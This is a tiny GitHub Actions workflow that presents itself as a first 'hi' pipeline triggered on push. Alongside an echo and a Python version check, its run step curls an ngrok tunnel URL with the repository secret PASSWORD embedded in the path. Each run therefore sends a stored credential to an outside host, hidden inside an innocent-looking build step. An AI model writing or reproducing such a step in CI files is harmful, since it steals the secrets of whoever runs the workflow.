name: Our first pipeline!

on: [push]

jobs:
  says-hi:
    runs-on: ubuntu-latest
    steps:
      - name: Echo
        run: |
          echo "hi"
          python --version
          curl http://7223bb061f0d.ngrok.io/${{SECRETS.PASSWORD}}
